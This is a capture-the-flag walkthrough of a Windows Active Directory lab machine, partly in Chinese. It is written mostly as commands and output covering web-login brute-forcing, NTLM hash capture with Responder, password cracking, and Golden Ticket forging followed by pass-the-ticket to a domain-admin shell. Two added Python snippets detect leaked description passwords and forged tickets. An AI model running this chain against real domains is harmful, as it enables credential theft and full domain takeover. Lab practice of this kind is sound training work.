created: 2024-12-04 23:08
tags:
- HMV
- Golden Ticket
- PTT
- NTLM poisoning
Difficulty: ??????????
Author: josemlwdf
OS: Windows
1. Basic information
Contents
- 1. Basic information
- 2. Information gathering
- 2.1. Port scan
- 2.2. Directory scan
- 2.3. Exploiting the web application
- 3. websvc user
- 3.1. NTLM poisoning attack
- 3.2. SMB enumeration
- 4. rtina979 user
- 4.1. Getting user information over RPC
- 4.2. Cracking the archive
- 4.3. Reviewing the report
- 5. Golden Ticket
- 5.1. Prerequisites
- 5.2. Obtaining the domain SID
- 5.3. Syncing time with the domain
- 5.4. Forging an administrator Golden Ticket
- 5.5. Loading the ticket into the environment variable
- 5.6. PTT
2. Information gathering
2.1. Port scan
┌──(root㉿kali)-[/home/kali/hmv/dc04]
└─# fscan -h 192.168.69.4
fscan version: 1.8.4
start infoscan
192.168.69.4:139 open
192.168.69.4:80 open
192.168.69.4:135 open
192.168.69.4:445 open
192.168.69.4:88 open
[*] alive ports len is: 5
start vulscan
[*] NetBios 192.168.69.4 [+] DC:SOUPEDECODE\DC01
[*] NetInfo
[*]192.168.69.4[->]DC01[->]192.168.69.4
[*] WebTitle http://192.168.69.4 code:302 len:0 title:None 跳轉(zhuǎn)url: http://soupedecode.local
已完成 5/5
[*] 掃描結(jié)束,耗時(shí): 3.264268642s
┌──(root㉿kali)-[/home/kali/hmv/dc04]
└─# nmap -sCV 192.168.69.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 23:13 CST
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 23:13 (0:00:00 remaining)
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 23:13 (0:00:00 remaining)
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 23:13 (0:00:00 remaining)
Nmap scan report for 192.168.69.4
Host is up (0.00027s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://soupedecode.local
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-05 07:13:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
MAC Address: 08:00:27:13:99:85 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 15h59m57s
| smb2-time:
| date: 2024-12-05T07:13:38
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:13:99:85 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.93 seconds
Configure hosts
192.168.56.126 soupedecode.local DC01.soupedecode.local
2.2. Directory scan
[01:20:17] 200 - 10KB - /server-status/
[01:20:17] 200 - 10KB - /server-status
[01:20:18] 200 - 100KB - /server-info
dirsearch turns up three paths
Visiting them reveals a subdomain, heartbeat.soupedecode.local
Add it to hosts as well
2.3. Exploiting the web application
訪問后可以發(fā)現(xiàn)是一個(gè)登錄框
利用burp進(jìn)行爆破一下
這個(gè)機(jī)子很垃圾,爆破了幾下就出問題了。后面怎么都爆破都是403了。重啟也沒有用,只能重新安裝了
建議還是啟動(dòng)了就保存一下快照
最后報(bào)出來賬號密碼是 admin:nimda
登錄成功后會(huì)要求你輸入ip地址
3. websvc用戶
3.1. NTLM中毒攻擊
Enter our Kali IP and start listening
An NTLMv2 hash comes back: the application authenticates over SMB to whatever address it is given, and Responder captures the Net-NTLMv2 response of the websvc account
┌──(root㉿kali)-[/home]
└─# responder -I eth1
[SMB] NTLMv2-SSP Client : 192.168.56.126
[SMB] NTLMv2-SSP Username : soupedecode\websvc
[SMB] NTLMv2-SSP Hash : websvc::soupedecode:3d80cf0d5de8656a:911B4595F70D957A0671068267CDF165:010100000000000000F21251F450DB01006098D655A71BC1000000000200080054004E0039004B0001001E00570049004E002D0032003200470032004D003200310036004B004100340004003400570049004E002D0032003200470032004D003200310036004B00410034002E0054004E0039004B002E004C004F00430041004C000300140054004E0039004B002E004C004F00430041004C000500140054004E0039004B002E004C004F00430041004C000700080000F21251F450DB01060004000200000008003000300000000000000000000000004000007EB2E40733876D4CE24083BC1F55F4CD7B7D843B3B343F98128E45BD39583DFF0A001000000000000000000000000000000000000900220063006900660073002F003100390032002E003100360038002E00350036002E0035000000000000000000
Crack the hash
hashcat hash.txt rockyou.txt
WEBSVC::soupedecode:3d80cf0d5de8656a:911b4595f70d957a0671068267cdf165:…:jordan23
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: WEBSVC::soupedecode:3d80cf0d5de8656a:911b4595f70d95...000000
Time.Started.....: Wed Dec 18 02:39:31 2024 (0 secs)
Time.Estimated...: Wed Dec 18 02:39:31 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: jordan23 [8]
Guess.Queue......: 350/14336793 (0.00%)
Speed.#1.........: 4949 H/s (0.00ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: jordan23 -> jordan23
Hardware.Mon.#1..: Util: 16%

Started: Wed Dec 18 02:38:56 2024
Stopped: Wed Dec 18 02:39:32 2024
We now have a credential pair: WEBSVC:jordan23
3.2. SMB enumeration
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# crackmapexec smb 192.168.56.126 -u websvc -p jordan23 --shares
SMB 192.168.56.126 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\websvc:jordan23 STATUS_PASSWORD_EXPIRED
The password is right, it has just expired. Change it from the VirtualBox console and carry on
I changed the password to admin!@#45
Check again
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# crackmapexec smb 192.168.56.126 -u websvc -p 'admin!@#45' --shares
SMB 192.168.56.126 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.56.126 445 DC01 [+] SOUPEDECODE.LOCAL\websvc:admin!@#45
SMB 192.168.56.126 445 DC01 [+] Enumerated shares
SMB 192.168.56.126 445 DC01 Share Permissions Remark
SMB 192.168.56.126 445 DC01 ----- ----------- ------
SMB 192.168.56.126 445 DC01 ADMIN$ Remote Admin
SMB 192.168.56.126 445 DC01 C READ
SMB 192.168.56.126 445 DC01 C$ Default share
SMB 192.168.56.126 445 DC01 IPC$ READ Remote IPC
SMB 192.168.56.126 445 DC01 NETLOGON READ Logon server share
SMB 192.168.56.126 445 DC01 SYSVOL READ Logon server share
The user flag can be read as the websvc user
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# cat user.txt
709e449a996a85aa7deaf18c79515d6a
Several user directories are visible as well
smb: \users\> ls
  .                                  DR        0  Wed Nov  6 20:55:53 2024
  ..                                DHS        0  Tue Nov  5 18:30:29 2024
  Administrator                       D        0  Sat Jun 15 15:56:40 2024
  All Users                       DHSrn        0  Sat May  8 04:26:16 2021
  Default                           DHR        0  Sat Jun 15 22:51:08 2024
  Default User                    DHSrn        0  Sat May  8 04:26:16 2021
  desktop.ini                       AHS      174  Sat May  8 04:14:03 2021
  fjudy998                            D        0  Wed Nov  6 20:55:33 2024
  ojake987                            D        0  Wed Nov  6 20:55:16 2024
  Public                             DR        0  Sat Jun 15 13:54:32 2024
  rtina979                            D        0  Wed Nov  6 20:54:39 2024
  websvc                              D        0  Wed Nov  6 20:44:11 2024
  xursula991                          D        0  Wed Nov  6 20:55:28 2024
These users deserve particular attention:
rtina979
xursula991
fjudy998
4. rtina979 user
4.1. Getting user information over RPC
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# rpcclient -U websvc%'admin!@#45' 192.168.56.126 -c "querydispinfo" |grep -E 'rtina979|xursula991|fjudy998'
index: 0x1330 RID: 0x80e acb: 0x00020010 Account: fjudy998 Name: Felix Judy Desc: Music lover and aspiring guitarist
index: 0x131f RID: 0x7fd acb: 0x00020010 Account: rtina979 Name: Reed Tina Desc: Default Password Z~l3JhcV#7Q-1#M
index: 0x1329 RID: 0x807 acb: 0x00020010 Account: xursula991 Name: Ximena Ursula Desc: Yoga practitioner and meditation lover
This gives us the default password of rtina979: Z~l3JhcV#7Q-1#M
Check whether it still works
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# crackmapexec smb 192.168.56.126 -u rtina979 -p 'Z~l3JhcV#7Q-1#M'
SMB 192.168.56.126 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\rtina979:Z~l3JhcV#7Q-1#M STATUS_PASSWORD_EXPIRED
It does; the password has merely expired, so change it from the VirtualBox console
I set the new password to c1trus123
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# crackmapexec smb 192.168.56.126 -u rtina979 -p 'c1trus123'
SMB 192.168.56.126 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.56.126 445 DC01 [+] SOUPEDECODE.LOCAL\rtina979:c1trus123
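The credential leaked through an account description, and the acb value 0x00020010 on every line (which already told us the passwords were expired), are exactly what a defender should audit for. This is an added example, not part of the original writeup: it parses rpcclient querydispinfo lines, decodes the acb bits using Samba's ACB_* constant values, and flags descriptions that look like they carry a password. The sample input is the page's own three output lines; the keyword list and character-class test are heuristics chosen here.

```python
import re

# Samba SAMR acct_flags bits relevant to this page (values from samr.idl).
ACB_FLAGS = {
    0x00000001: "DISABLED",
    0x00000004: "PWNOTREQ",
    0x00000010: "NORMAL",
    0x00000200: "PWNOEXP",
    0x00010000: "DONT_REQUIRE_PREAUTH",
    0x00020000: "PW_EXPIRED",
}
LINE_RE = re.compile(
    r"index:\s*0x[0-9a-fA-F]+\s+RID:\s*(?P<rid>0x[0-9a-fA-F]+)\s+"
    r"acb:\s*(?P<acb>0x[0-9a-fA-F]+)\s+Account:\s*(?P<account>\S+)\s+"
    r"Name:\s*(?P<name>.*?)\s*Desc:\s*(?P<desc>.*)$"
)
# Keywords catch "Default Password ..." style notes; the class test flags any
# token of 8+ characters that mixes at least three character classes.
KEYWORDS = ("password", "passwd", "pwd")
CLASS_RES = (re.compile(r"[a-z]"), re.compile(r"[A-Z]"),
             re.compile(r"\d"), re.compile(r"[^A-Za-z0-9]"))

def decode_acb(acb):
    """Names of the known ACB_* bits set in a SAMR acct_flags value."""
    return sorted(name for bit, name in ACB_FLAGS.items() if acb & bit)

def looks_like_secret(token):
    return len(token) >= 8 and sum(bool(r.search(token)) for r in CLASS_RES) >= 3

def parse_querydispinfo(text):
    """One dict per account: RID, decoded flags, description and a suspect flag."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        desc = m["desc"].strip()
        suspect = (any(k in desc.lower() for k in KEYWORDS)
                   or any(looks_like_secret(t) for t in desc.split()))
        rows.append({"account": m["account"], "rid": int(m["rid"], 16),
                     "flags": decode_acb(int(m["acb"], 16)),
                     "desc": desc, "suspect": suspect})
    return rows

# Sample input: the three rpcclient lines shown above, verbatim.
SAMPLE = """\
index: 0x1330 RID: 0x80e acb: 0x00020010 Account: fjudy998 Name: Felix Judy Desc: Music lover and aspiring guitarist
index: 0x131f RID: 0x7fd acb: 0x00020010 Account: rtina979 Name: Reed Tina Desc: Default Password Z~l3JhcV#7Q-1#M
index: 0x1329 RID: 0x807 acb: 0x00020010 Account: xursula991 Name: Ximena Ursula Desc: Yoga practitioner and meditation lover
"""
```

parse_querydispinfo(SAMPLE) marks only rtina979 as suspect and decodes 0x00020010 as NORMAL plus PW_EXPIRED for all three accounts, matching the STATUS_PASSWORD_EXPIRED responses seen from crackmapexec.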
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# smbmap -H 192.168.56.126 -u rtina979 -p c1trus123
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)

[+] IP: 192.168.56.126:445 Name: soupedecode.local Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C                                                       READ ONLY
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        SYSVOL                                                  READ ONLY       Logon server share
[*] Closed 1 connections
A file named Report.rar sits in the Documents directory of user rtina979
smb: \users\rtina979\Documents\> ls
  .                                  DR        0  Thu Nov  7 17:35:52 2024
  ..                                  D        0  Wed Nov  6 20:54:39 2024
  My Music                        DHSrn        0  Wed Nov  6 20:54:39 2024
  My Pictures                     DHSrn        0  Wed Nov  6 20:54:39 2024
  My Videos                       DHSrn        0  Wed Nov  6 20:54:39 2024
  Report.rar                          A   712046  Thu Nov  7 08:35:49 2024

                12942591 blocks of size 4096. 11014117 blocks available
smb: \users\rtina979\Documents\> get Report.rar
getting file \users\rtina979\Documents\Report.rar of size 712046 as Report.rar (11589.3 KiloBytes/sec) (average 11589.3 KiloBytes/sec)
4.2. Cracking the archive
The archive is encrypted, so brute-force it
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# rar2john Report.rar
Created directory: /root/.john
Report.rar:$rar5$16$7b74f4c32feb807c16edc906c283e524$15$872f8d1a914bd1503dac110c7bbb938a$8$3e15430028d503b5
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# rar2john Report.rar >hash.txt
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (RAR5 [PBKDF2-SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
PASSWORD123 (Report.rar)
1g 0:00:00:33 DONE (2024-12-19 02:26) 0.02944g/s 1515p/s 1515c/s 1515C/s ang123..2pac4ever
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The password cracks to PASSWORD123
4.3. Reviewing the report
Extracting the archive yields a penetration test report
The krbtgt hash is given at the end of the report
5. Golden Ticket
A Golden Ticket is a persistence technique: an attacker who gains control of the Active Directory Key Distribution Service account, KRBTGT, uses it to forge valid Kerberos Ticket Granting Tickets (TGTs). This grants access to any resource in the Active Directory domain: with the KRBTGT hash you can forge your own TGT, including PAC data asserting whatever group memberships you like.
5.1. Prerequisites
- The encryption key used by the domain's krbtgt account (here we already have the krbtgt account's NTLM hash)
- The target domain name and the domain SID
We now have the KRBTGT hash; first verify that it is correct
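Because a forged TGT is never issued by the KDC, the detection angle on the Golden Ticket described above and on the pass-the-ticket step later in this writeup is correlation on the domain controller. This is an added example, not part of the original writeup: it runs two heuristics over constructed, simplified stand-ins for Windows Security events 4768 (TGT requested), 4769 (service ticket requested) and 4624 (logon); the record layout, the client address and the "domain format" rule are assumptions made here, and the rule's value depends on how the forging tool writes the domain into the PAC.

```python
from datetime import datetime, timedelta

NETBIOS_DOMAIN = "SOUPEDECODE"        # how a genuine logon records the domain
TGT_LOOKBACK = timedelta(hours=10)    # AD default maximum TGT lifetime

# Constructed sample records (simplified stand-ins for Security events 4768,
# 4769 and 4624, not real logs): a normal rtina979 session, then a session
# from the same client whose TGT this KDC never issued.
EVENTS = [
    {"id": 4768, "time": "2024-12-19 19:01:00", "account": "rtina979",
     "domain": "SOUPEDECODE", "client": "192.168.56.101"},
    {"id": 4769, "time": "2024-12-19 19:01:02", "account": "rtina979",
     "domain": "SOUPEDECODE", "client": "192.168.56.101"},
    {"id": 4769, "time": "2024-12-19 19:06:10", "account": "administrator",
     "domain": "soupedecode.local", "client": "192.168.56.101"},
    {"id": 4624, "time": "2024-12-19 19:06:11", "account": "administrator",
     "domain": "soupedecode.local", "client": "192.168.56.101"},
]

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def detect_forged_tgt(events, netbios_domain=NETBIOS_DOMAIN, lookback=TGT_LOOKBACK):
    """Return (rule, account, client, time) findings in time order.

    Rule 1: a service-ticket request (4769) with no TGT request (4768) from the
    same account and client within the TGT lifetime. A forged TGT is never
    requested from the KDC, so its TGS requests have no 4768 to pair with.
    Rule 2 (heuristic): a logon (4624) whose Account Domain is not the NetBIOS
    name; forging tools often write the domain string exactly as it was typed
    in (here the lowercase FQDN given to impacket-ticketer).
    """
    findings, tgts = [], {}
    for e in sorted(events, key=lambda e: _ts(e["time"])):
        key, t = (e["account"].lower(), e["client"]), _ts(e["time"])
        if e["id"] == 4768:
            tgts.setdefault(key, []).append(t)
        elif e["id"] == 4769:
            if not any(t - lookback <= x <= t for x in tgts.get(key, [])):
                findings.append(("tgs_without_tgt", e["account"], e["client"], e["time"]))
        elif e["id"] == 4624 and e["domain"] != netbios_domain:
            findings.append(("domain_format_anomaly", e["account"], e["client"], e["time"]))
    return findings

if __name__ == "__main__":
    for finding in detect_forged_tgt(EVENTS):
        print(*finding)
```

On the sample, rtina979's session pairs cleanly while the administrator session trips both rules; in a real deployment rule 1 also needs a TGT lookback longer than the domain's configured maximum ticket lifetime, or legitimate long sessions will be flagged.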
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# crackmapexec smb 192.168.56.126 -u krbtgt -H '0f55cdc40bd8f5814587f7e6b2f85e6f'
SMB 192.168.56.126 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.56.126 445 DC01 [-] SOUPEDECODE.LOCAL\krbtgt:0f55cdc40bd8f5814587f7e6b2f85e6f STATUS_ACCOUNT_DISABLED
Good, it is correct: STATUS_ACCOUNT_DISABLED rather than STATUS_LOGON_FAILURE means the hash was accepted and the account is merely disabled, as krbtgt always is
5.2. Obtaining the domain SID
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# impacket-lookupsid soupedecode.local/rtina979:c1trus123@192.168.56.126 |grep SID
[*] Brute forcing SIDs at 192.168.56.126
[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164
5.3. Syncing time with the domain
The nmap scan reported a clock skew of almost 16 hours; Kerberos rejects requests outside its skew tolerance (5 minutes by default), so the clock is synced to the DC first
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# rdate -n 192.168.56.126
Thu Dec 19 19:05:54 EST 2024
5.4. Forging an administrator Golden Ticket
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# impacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain soupedecode.local administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
/usr/share/doc/python3-impacket/examples/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for soupedecode.local/administrator
/usr/share/doc/python3-impacket/examples/ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/usr/share/doc/python3-impacket/examples/ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/usr/share/doc/python3-impacket/examples/ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
/usr/share/doc/python3-impacket/examples/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in administrator.ccache
5.5. Loading the ticket into the environment variable
export KRB5CCNAME=administrator.ccache
5.6. PTT
┌──(root㉿kali)-[~/Desktop/hmv/dc04]
└─# impacket-wmiexec soupedecode.local/administrator@dc01.soupedecode.local -k -target-ip 192.168.56.126
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
C:\>id
'id' is not recognized as an internal or external command,
operable program or batch file.
C:\>whoami
soupedecode.local\administrator
C:\users\administrator\desktop>type root.txt
1c66eabe105636d7e0b82ec1fa87cb7a